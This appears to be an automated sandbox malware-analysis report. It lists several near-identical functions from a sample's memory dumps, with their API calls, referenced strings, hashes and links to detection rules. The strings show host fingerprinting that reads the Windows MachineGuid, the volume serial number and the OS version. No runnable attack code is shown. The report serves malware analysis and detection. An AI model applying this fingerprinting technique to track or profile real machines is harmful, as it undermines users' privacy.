[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE11504C38
%, xrefs: 00007FFE11504DC7
~, xrefs: 00007FFE11504EE7
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE11504DDA, 00007FFE11504EAE
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11504C6D
C:\Windows, xrefs: 00007FFE11504CB1, 00007FFE11504D9E

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: e7e85a61618da36f147663b45e66434ba37cae056eceaab88f60427f3ee203cc
Instruction ID: 985430f3e5b7c289967aa280a9ebf8849399dfda434b78d4aaf4cfbcbe6d2437
Opcode Fuzzy Hash: e7e85a61618da36f147663b45e66434ba37cae056eceaab88f60427f3ee203cc
Instruction Fuzzy Hash: 04D19222E1CE5381FB219797E4543BC67A9AF41778F5840BAC96E472B0DE3CEC848781

Function 00007FFE13302610 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE13307474: LoadLibraryA.KERNEL32 ref: 00007FFE13307482

Part of subcall function 00007FFE133073F3: GetProcAddress.KERNEL32 ref: 00007FFE13307413

FreeLibrary.KERNEL32 ref: 00007FFE133026A3
GetNativeSystemInfo.KERNEL32 ref: 00007FFE133026EF
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE13302708
GetLastError.KERNEL32 ref: 00007FFE13302716

Strings

[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE13302728
ntdll.dll, xrefs: 00007FFE13302618
C:\Windows, xrefs: 00007FFE13302701, 00007FFE133027EE
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE133029CC
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE13302913
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE13302A62
, xrefs: 00007FFE133028E1
\, xrefs: 00007FFE1330286E
P, xrefs: 00007FFE13302940
~, xrefs: 00007FFE13302937
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE133028D5
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE13302838
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE13302803
:, xrefs: 00007FFE13302869
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE133026BD
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE1330282A, 00007FFE133028FE
RtlGetVersion, xrefs: 00007FFE13302630
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE13302688
sys_init, xrefs: 00007FFE13302681, 00007FFE133026B6, 00007FFE13302721, 00007FFE133027FC, 00007FFE133028CE, 00007FFE1330290C, 00007FFE133029C5, 00007FFE13302A5B, 00007FFE13302B2A
%, xrefs: 00007FFE13302817
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE13302B31
MachineGuid, xrefs: 00007FFE13302831

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 51a51f11c0d5ecfdc629bd7f59c270cc0ff0045a96e4eafe8e70bee8bd30c64d
Instruction ID: 615ac9e978d44e7cddc3924ad36d4f366b09c090dcb078acdf02754ef02b98b4
Opcode Fuzzy Hash: 51a51f11c0d5ecfdc629bd7f59c270cc0ff0045a96e4eafe8e70bee8bd30c64d
Instruction Fuzzy Hash: 3AD18B21E0CE57CDFA208B17E4403BD6660AF60778F1540F2D96EB76B6CE6DE8448749

Function 00007FFE0EB4E870 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0EB41AA4: LoadLibraryA.KERNEL32 ref: 00007FFE0EB41AB2

Part of subcall function 00007FFE0EB41A23: GetProcAddress.KERNEL32 ref: 00007FFE0EB41A43

FreeLibrary.KERNEL32 ref: 00007FFE0EB4E903
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0EB4E94F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0EB4E968
GetLastError.KERNEL32 ref: 00007FFE0EB4E976

Strings

\, xrefs: 00007FFE0EB4EACE
~, xrefs: 00007FFE0EB4EB97
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4E91D
RtlGetVersion, xrefs: 00007FFE0EB4E890
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0EB4EB73
P, xrefs: 00007FFE0EB4EBA0
ntdll.dll, xrefs: 00007FFE0EB4E878
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0EB4EC2C
:, xrefs: 00007FFE0EB4EAC9
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0EB4EA63
MachineGuid, xrefs: 00007FFE0EB4EA91
%, xrefs: 00007FFE0EB4EA77
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0EB4EB35
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0EB4E988
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0EB4EA8A, 00007FFE0EB4EB5E
sys_init, xrefs: 00007FFE0EB4E8E1, 00007FFE0EB4E916, 00007FFE0EB4E981, 00007FFE0EB4EA5C, 00007FFE0EB4EB2E, 00007FFE0EB4EB6C, 00007FFE0EB4EC25, 00007FFE0EB4ECBB, 00007FFE0EB4ED8A
, xrefs: 00007FFE0EB4EB41
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0EB4ECC2
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0EB4E8E8
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0EB4ED91
C:\Windows, xrefs: 00007FFE0EB4E961, 00007FFE0EB4EA4E
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0EB4EA98

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
Instruction ID: 2daa8c33c53abfb9cf2336bf25d7de92785300d82188a89b5bacee11b40c1ee2
Opcode Fuzzy Hash: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
Instruction Fuzzy Hash: DED15CA2E0CB5782FA709F19A8843B966A1FF44754F594132C9CE5B2F1DE2CE884CF41

Function 00007FFE0EBD3420 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0EBD9FF4: LoadLibraryA.KERNEL32 ref: 00007FFE0EBDA002

Part of subcall function 00007FFE0EBD9F73: GetProcAddress.KERNEL32 ref: 00007FFE0EBD9F93

FreeLibrary.KERNEL32 ref: 00007FFE0EBD34B3
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0EBD34FF
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0EBD3518
GetLastError.KERNEL32 ref: 00007FFE0EBD3526

Strings

[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0EBD3941
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0EBD3648
MachineGuid, xrefs: 00007FFE0EBD3641
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0EBD3613
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0EBD3723
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0EBD3872
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0EBD36E5
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EBD34CD
sys_init, xrefs: 00007FFE0EBD3491, 00007FFE0EBD34C6, 00007FFE0EBD3531, 00007FFE0EBD360C, 00007FFE0EBD36DE, 00007FFE0EBD371C, 00007FFE0EBD37D5, 00007FFE0EBD386B, 00007FFE0EBD393A
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0EBD363A, 00007FFE0EBD370E
%, xrefs: 00007FFE0EBD3627
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0EBD3498
C:\Windows, xrefs: 00007FFE0EBD3511, 00007FFE0EBD35FE
, xrefs: 00007FFE0EBD36F1
P, xrefs: 00007FFE0EBD3750
RtlGetVersion, xrefs: 00007FFE0EBD3440
\, xrefs: 00007FFE0EBD367E
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0EBD3538
ntdll.dll, xrefs: 00007FFE0EBD3428
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0EBD37DC
:, xrefs: 00007FFE0EBD3679
~, xrefs: 00007FFE0EBD3747

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 43bcd0575c0f7ec6056dd52dc064e9ae3c34a18d5cafb5303807578d007f6b06
Instruction ID: 0af10df0c60e3f7d618654f277240a6e2a36bea0c7ce0779b12149e827fdb83c
Opcode Fuzzy Hash: 43bcd0575c0f7ec6056dd52dc064e9ae3c34a18d5cafb5303807578d007f6b06
Instruction Fuzzy Hash: F4D14722E0D65282FB328F54E4403F967A0AF41B54F154172C9DE573BAEE6DED848F82

Function 00007FFE0EC04430 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0EC02174: LoadLibraryA.KERNEL32 ref: 00007FFE0EC02182

Part of subcall function 00007FFE0EC020F3: GetProcAddress.KERNEL32 ref: 00007FFE0EC02113

FreeLibrary.KERNEL32 ref: 00007FFE0EC044C3
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0EC0450F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0EC04528
GetLastError.KERNEL32 ref: 00007FFE0EC04536

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EC044DD
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0EC04882
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0EC04623
MachineGuid, xrefs: 00007FFE0EC04651
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0EC047EC
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0EC044A8
~, xrefs: 00007FFE0EC04757
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0EC046F5
ntdll.dll, xrefs: 00007FFE0EC04438
P, xrefs: 00007FFE0EC04760
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0EC04548
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0EC04733
\, xrefs: 00007FFE0EC0468E
%, xrefs: 00007FFE0EC04637
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0EC04658
RtlGetVersion, xrefs: 00007FFE0EC04450
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0EC04951
, xrefs: 00007FFE0EC04701
:, xrefs: 00007FFE0EC04689
sys_init, xrefs: 00007FFE0EC044A1, 00007FFE0EC044D6, 00007FFE0EC04541, 00007FFE0EC0461C, 00007FFE0EC046EE, 00007FFE0EC0472C, 00007FFE0EC047E5, 00007FFE0EC0487B, 00007FFE0EC0494A
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0EC0464A, 00007FFE0EC0471E
C:\Windows, xrefs: 00007FFE0EC04521, 00007FFE0EC0460E

Memory Dump Source

Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true

Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
Instruction ID: d0ad5404ba2a4adfb2e5791e32cf1d4d3ba87d3a6c5ad1fdb3d4b059e442e62d
Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
Instruction Fuzzy Hash: 73D19162E0C6D2B1FB648794A4C03BA6251BF46798F550172CEDD472B1DE2FEC448783

Function 00007FFE0E169770 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E16CF94: LoadLibraryA.KERNEL32 ref: 00007FFE0E16CFA2

Part of subcall function 00007FFE0E16CF13: GetProcAddress.KERNEL32 ref: 00007FFE0E16CF33

FreeLibrary.KERNEL32 ref: 00007FFE0E169803
GetNativeSystemInfo.KERNEL32 ref: 00007FFE0E16984F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE0E169868
GetLastError.KERNEL32 ref: 00007FFE0E169876

Strings

%, xrefs: 00007FFE0E169977
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFE0E16998A, 00007FFE0E169A5E
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE0E169B2C
P, xrefs: 00007FFE0E169AA0
~, xrefs: 00007FFE0E169A97
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE0E169A35
ntdll.dll, xrefs: 00007FFE0E169778
:, xrefs: 00007FFE0E1699C9
, xrefs: 00007FFE0E169A41
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFE0E1697E8
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE0E169888
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE0E169963
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE0E169BC2
\, xrefs: 00007FFE0E1699CE
RtlGetVersion, xrefs: 00007FFE0E169790
MachineGuid, xrefs: 00007FFE0E169991
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE0E169C91
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16981D
sys_init, xrefs: 00007FFE0E1697E1, 00007FFE0E169816, 00007FFE0E169881, 00007FFE0E16995C, 00007FFE0E169A2E, 00007FFE0E169A6C, 00007FFE0E169B25, 00007FFE0E169BBB, 00007FFE0E169C8A
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE0E169998
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE0E169A73
C:\Windows, xrefs: 00007FFE0E169861, 00007FFE0E16994E

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
Instruction ID: 7c282bbee82bafe90567b4e7a44e0ebd147d0590c6287177b8491d22871f12c1
Opcode Fuzzy Hash: 3028c8487b4850c2a8afba3d3fc94739010c0dc3b44ea0e207f98bdf53cb8255
Instruction Fuzzy Hash: 06D15762E0C65B82FB208B14E4803B963A4AF85B95F654033D9CE576F6DE3DE885C781

Function 00007FF6BFD693F0 Relevance: 52.8, APIs: 10, Strings: 20, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BFD61694: LoadLibraryA.KERNEL32(?,?,service,0000013B444313D0,00007FF6BFD69404), ref: 00007FF6BFD616A2

Part of subcall function 00007FF6BFD61613: GetProcAddress.KERNEL32(?,?,00000000,0000013B444313D0,?,00007FF6BFD6941F), ref: 00007FF6BFD61633

FreeLibrary.KERNEL32 ref: 00007FF6BFD69483
GetNativeSystemInfo.KERNEL32 ref: 00007FF6BFD694CF
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6BFD694E8
GetLastError.KERNEL32 ref: 00007FF6BFD694F6

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00007FF6BFD69618
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FF6BFD6960A, 00007FF6BFD696DE
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FF6BFD69911
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FF6BFD696B5
RtlGetVersion, xrefs: 00007FF6BFD69410
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF6BFD6949D
:, xrefs: 00007FF6BFD69649
\, xrefs: 00007FF6BFD6964E
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FF6BFD69842
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FF6BFD697AC
sys_init, xrefs: 00007FF6BFD69461, 00007FF6BFD69496, 00007FF6BFD69501, 00007FF6BFD695DC, 00007FF6BFD696AE, 00007FF6BFD696EC, 00007FF6BFD697A5, 00007FF6BFD6983B, 00007FF6BFD6990A
%, xrefs: 00007FF6BFD695F7
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FF6BFD69468
MachineGuid, xrefs: 00007FF6BFD69611
ntdll.dll, xrefs: 00007FF6BFD693F8
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FF6BFD695E3
C:\Windows, xrefs: 00007FF6BFD694E1, 00007FF6BFD695CE
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FF6BFD696F3
service, xrefs: 00007FF6BFD693F3
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FF6BFD69508

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
